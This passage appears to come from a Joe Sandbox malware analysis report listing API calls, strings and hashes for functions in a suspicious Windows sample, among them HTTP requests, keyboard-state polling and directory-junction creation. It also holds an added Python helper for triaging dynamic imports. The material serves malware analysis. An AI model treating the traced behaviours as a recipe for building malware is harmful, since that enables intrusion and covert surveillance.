                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 005B07B0
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 005B07BB
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 005B07C6
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 005B07D1
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 005B07DC
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 005B07E7
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 005B07F2
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 005B07FD
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 005B0808
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 005B0813
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 005B081E
                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 005B0829
                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 005B0839
                                                                                                                                                      • GetLastError.KERNEL32 ref: 005B087B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                      • Opcode ID: 805696490c48344fa12cdbcc38e9293831f935ac4406e3d4f99b7c3485da11ba
                                                                                                                                                      • Instruction ID: 26f71a5a5bb1da37d4d96400c073503739f117eeed335780e8106c8c319a1cc3
                                                                                                                                                      • Opcode Fuzzy Hash: 805696490c48344fa12cdbcc38e9293831f935ac4406e3d4f99b7c3485da11ba
                                                                                                                                                      • Instruction Fuzzy Hash: 534142B0D083196ADB109FBA8C89C5EBFE8FF04754B50452AF11DE7291DA78E901CF91
                                                                                                                                                      APIs
                                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00550456
                                                                                                                                                        • Part of subcall function 0055047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0060170C,00000FA0,6BC079AF,?,?,?,?,00572753,000000FF), ref: 005504AC
                                                                                                                                                        • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00572753,000000FF), ref: 005504B7
                                                                                                                                                        • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00572753,000000FF), ref: 005504C8
                                                                                                                                                        • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005504DE
                                                                                                                                                        • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005504EC
                                                                                                                                                        • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005504FA
                                                                                                                                                        • Part of subcall function 0055047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00550525
                                                                                                                                                        • Part of subcall function 0055047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00550530
                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 00550477
                                                                                                                                                        • Part of subcall function 00550433: __onexit.LIBCMT ref: 00550439
                                                                                                                                                      Strings
                                                                                                                                                      • SleepConditionVariableCS, xrefs: 005504E4
                                                                                                                                                      • WakeAllConditionVariable, xrefs: 005504F2
                                                                                                                                                      • kernel32.dll, xrefs: 005504C3
                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005504B2
                                                                                                                                                      • InitializeConditionVariable, xrefs: 005504D8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                                                      • Opcode ID: 56a2cc6c5ae5dd1319cbde00030b1831f1b61e85eaed020e1d2678ad7ce178ef
                                                                                                                                                      • Instruction ID: b025be827c6c7bee452317aba09a663932f501d934beb7b3484210e40901a0a5
                                                                                                                                                      • Opcode Fuzzy Hash: 56a2cc6c5ae5dd1319cbde00030b1831f1b61e85eaed020e1d2678ad7ce178ef
                                                                                                                                                      • Instruction Fuzzy Hash: 1921DA32680711AFD7216F68AC19F6A7EA5FB55B62F04212BFD05D62D0DB648C08CA61
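The two functions above that reach GetProcAddress (the CRT start-up routine at 00550456 and the loader routine at 005B4A18) are the places an analyst usually checks first for dynamically resolved imports, since such imports never appear in the PE import table. The following Python is an added triage helper, not part of the Joe Sandbox report: it parses API reference lines in the exact format used in this listing, distinguishes direct calls from those reported as "Part of subcall function", and pulls out the string names passed to GetProcAddress together with the DLL names passed to LoadLibrary/GetModuleHandle. The sample input is constructed by copying lines from the two listings on this page. Note the caveat the result illustrates: resolving InitializeConditionVariable, SleepConditionVariableCS and WakeAllConditionVariable through api-ms-win-core-synch-l1-2-0.dll/kernel32.dll is standard MSVC CRT start-up behaviour and is not by itself an indicator of malicious dynamic API resolution.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# One API reference line as rendered in a Joe Sandbox function listing, e.g.
#   • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005504EC
#   • _wcslen.LIBCMT ref: 005A485D                      (no argument list)
#   • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 005504B7
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}


@dataclass(frozen=True)
class ApiRef:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str                    # address of the call site
    via_subcall: Optional[str]  # address of the callee when reported as "Part of subcall", else None


def parse_api_lines(lines: Iterable[str]) -> List[ApiRef]:
    """Parse API reference lines; headers, string xrefs and other lines are skipped."""
    refs = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        refs.append(ApiRef(m.group("name"), m.group("module"), args,
                           m.group("ref").upper(), m.group("callee")))
    return refs


def dynamic_imports(refs: Iterable[ApiRef]) -> List[str]:
    """API names passed to GetProcAddress as literal strings (ordinals and '?' are skipped)."""
    names: List[str] = []
    for r in refs:
        if r.name == "GetProcAddress" and len(r.args) >= 2:
            target = r.args[1]
            if target != "?" and not HEX8.match(target) and target not in names:
                names.append(target)
    return names


def loaded_modules(refs: Iterable[ApiRef]) -> List[str]:
    """DLL names passed to LoadLibrary*/GetModuleHandle*, in order of first appearance."""
    mods: List[str] = []
    for r in refs:
        if r.name in LOADERS and r.args and r.args[0].lower().endswith(".dll"):
            if r.args[0] not in mods:
                mods.append(r.args[0])
    return mods


def call_depth_summary(refs: Iterable[ApiRef]) -> Tuple[int, int]:
    """(direct calls, calls reported as part of a subcall)."""
    refs = list(refs)
    direct = sum(1 for r in refs if r.via_subcall is None)
    return direct, len(refs) - direct


# Constructed sample: lines copied from the two GetProcAddress-bearing listings on this page.
SAMPLE_LISTING = """
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00550456
  • Part of subcall function 0055047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0060170C,00000FA0,6BC079AF,?,?,?,?,00572753,000000FF), ref: 005504AC
  • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00572753,000000FF), ref: 005504B7
  • Part of subcall function 0055047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00572753,000000FF), ref: 005504C8
  • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005504DE
  • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005504EC
  • Part of subcall function 0055047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005504FA
  • Part of subcall function 0055047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00550525
  • Part of subcall function 0055047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00550530
• ___scrt_fastfail.LIBCMT ref: 00550477
  • Part of subcall function 00550433: __onexit.LIBCMT ref: 00550439
Strings
• SleepConditionVariableCS, xrefs: 005504E4
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,005CDCD0), ref: 005B4A18
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005B4A2A
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,005CDCD0), ref: 005B4A4F
• FreeLibrary.KERNEL32(00000000,?,005CDCD0), ref: 005B4A9B
• StringFromGUID2.OLE32(?,?,00000028,?,005CDCD0), ref: 005B4B05
"""

if __name__ == "__main__":
    refs = parse_api_lines(SAMPLE_LISTING.splitlines())
    print("direct/subcall:", call_depth_summary(refs))
    print("modules:", loaded_modules(refs))
    print("resolved via GetProcAddress:", dynamic_imports(refs))
```

Run against a whole report rather than this fragment, the interesting output is the set of names that are not explained by CRT initialisation or by the AutoIt runtime; anything resolved by hash or ordinal shows up here as a missing string, which is itself a reason to look at that function by hand.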
                                                                                                                                                      APIs
                                                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,005CDCD0), ref: 005A4E81
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4E95
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4EF3
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4F4E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A4F99
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A5001
                                                                                                                                                        • Part of subcall function 0054FD60: _wcslen.LIBCMT ref: 0054FD6B
                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,005F7C10,00000061), ref: 005A509D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                                                                      • Opcode ID: b57048b52accb67809064cd7855b45aa7ab787bd54460b93a37d9937e23c1831
                                                                                                                                                      • Instruction ID: 17cb8010d3307742fbbd701d754df2415d750f47efe6e90ea843e37123365367
                                                                                                                                                      • Opcode Fuzzy Hash: b57048b52accb67809064cd7855b45aa7ab787bd54460b93a37d9937e23c1831
                                                                                                                                                      • Instruction Fuzzy Hash: 33B1DF316087029FC710DF28C894A7EBFE5BFE6724F10891DF59687291EB70D845CA92
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,005CDCD0), ref: 005B4A18
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005B4A2A
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,005CDCD0), ref: 005B4A4F
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,005CDCD0), ref: 005B4A9B
                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,005CDCD0), ref: 005B4B05
                                                                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 005B4BBF
                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005B4C25
                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005B4C4F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                      • API String ID: 354098117-199464113
                                                                                                                                                      • Opcode ID: 0e61db13f2479d63778f47fbe81e606b04117e25b10d1c5c4a9c18a5245881e2
                                                                                                                                                      • Instruction ID: 4fbb3bec1852bfb037eaff76a4f35de562e816840c71e9baf0ed42316c8d79c8
                                                                                                                                                      • Opcode Fuzzy Hash: 0e61db13f2479d63778f47fbe81e606b04117e25b10d1c5c4a9c18a5245881e2
                                                                                                                                                      • Instruction Fuzzy Hash: C2120971A00115EFDB25CF94C884EAEBBB9FF85314F248098E915AB252D731ED46CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005ACE0D
                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 005ACE20
                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 005ACE34
                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 005ACE4D
                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 005ACE90
                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 005ACEA6
                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005ACEB1
                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005ACEE1
                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 005ACF39
                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 005ACF4D
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 005ACF58
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                      • Opcode ID: 774973ee7e5d6149cc008e2d559839b61465536cbb65b83d3c863425e9893627
                                                                                                                                                      • Instruction ID: 6f87a416625444afc7d3f5a48da27a9b0eec2c8c56b32967f473fcb7684a6714
                                                                                                                                                      • Opcode Fuzzy Hash: 774973ee7e5d6149cc008e2d559839b61465536cbb65b83d3c863425e9893627
                                                                                                                                                      • Instruction Fuzzy Hash: 5E5158B5500609BFDB219F64CD88AAE7FFDFB19744F008429F94AD6210D734E948EBA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 005321E4: GetWindowLongW.USER32(?,000000EB), ref: 005321F2
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00532102
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 259745315-1270690246
                                                                                                                                                      • Opcode ID: b7a842b0f0688ba257e768a10f0c2308086f589317c5462d7e35bf3b11d6da33
                                                                                                                                                      • Instruction ID: 440ee78268778195f47b564dc194ad3da98b754c05802b33371ff683c2f4a163
                                                                                                                                                      • Opcode Fuzzy Hash: b7a842b0f0688ba257e768a10f0c2308086f589317c5462d7e35bf3b11d6da33
                                                                                                                                                      • Instruction Fuzzy Hash: 60418F71100A40AFDB205F38DD88BBA3FB5BB56730F148655FAA6872E1C7319D46EB20
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(00602990,000000FF,00000000,00000030), ref: 0059C888
                                                                                                                                                      • SetMenuItemInfoW.USER32(00602990,00000004,00000000,00000030), ref: 0059C8BD
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0059C8CF
                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0059C915
                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0059C932
                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 0059C95E
                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0059C9A5
                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059C9EB
                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059CA00
                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059CA21
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                      • Opcode ID: f96b0cacfd20d24c08b6e5e02424fdf19e52a5d1c945006fbc55260910dfb82b
                                                                                                                                                      • Instruction ID: 2dbe4124763fc486a1e5d15c0aef7ccc0fba95cd14aacfa327efa51e2feb5e70
                                                                                                                                                      • Opcode Fuzzy Hash: f96b0cacfd20d24c08b6e5e02424fdf19e52a5d1c945006fbc55260910dfb82b
                                                                                                                                                      • Instruction Fuzzy Hash: A76167B090025AAFDF15CF68C998EAEBFB9FF45308F044569E841A3291D734AE45DB70
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005C43FC
                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005C43FF
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 005C4426
                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005C4449
                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005C44C1
                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 005C450B
                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 005C4526
                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 005C4541
                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 005C4555
                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005C4572
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 312131281-1270690246
                                                                                                                                                      • Opcode ID: 8159b26254c7e8b8a687f4e5b7be996963738b517491a05861d39f18743ec808
                                                                                                                                                      • Instruction ID: 06f123e3dacbe64aa924103d9ff0e0105738b4f739e3fdd59a0c057582226abe
                                                                                                                                                      • Opcode Fuzzy Hash: 8159b26254c7e8b8a687f4e5b7be996963738b517491a05861d39f18743ec808
                                                                                                                                                      • Instruction Fuzzy Hash: 27615575900209AFDB11CFA8CC95FEE7BB8FB49710F10416AFA14A72A1C770AA45DF60
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 0059E3E9
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0059E40F
• _wcslen.LIBCMT ref: 0059E419
• _wcsstr.LIBVCRUNTIME ref: 0059E469
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0059E485
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005A469A
• _wcslen.LIBCMT ref: 005A46C7
• CreateDirectoryW.KERNEL32(?,00000000), ref: 005A46F7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 005A4718
• RemoveDirectoryW.KERNEL32(?), ref: 005A4728
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 005A47AF
• CloseHandle.KERNEL32(00000000), ref: 005A47BA
• CloseHandle.KERNEL32(00000000), ref: 005A47C5
Strings
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
APIs
• GetKeyboardState.USER32(?), ref: 0059A8EE
• SetKeyboardState.USER32(?), ref: 0059A959
• GetAsyncKeyState.USER32(000000A0), ref: 0059A979
• GetKeyState.USER32(000000A0), ref: 0059A990
• GetAsyncKeyState.USER32(000000A1), ref: 0059A9BF
• GetKeyState.USER32(000000A1), ref: 0059A9D0
• GetAsyncKeyState.USER32(00000011), ref: 0059A9FC
• GetKeyState.USER32(00000011), ref: 0059AA0A
• GetAsyncKeyState.USER32(00000012), ref: 0059AA33
• GetKeyState.USER32(00000012), ref: 0059AA41
• GetAsyncKeyState.USER32(0000005B), ref: 0059AA6A
• GetKeyState.USER32(0000005B), ref: 0059AA78
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 00596571
• GetWindowRect.USER32(00000000,?), ref: 0059658A
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005965E8
• GetDlgItem.USER32(?,00000002), ref: 005965F8
• GetWindowRect.USER32(00000000,?), ref: 0059660A
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 0059665E
• GetDlgItem.USER32(?,000003E9), ref: 0059666C
• GetWindowRect.USER32(00000000,?), ref: 0059667E
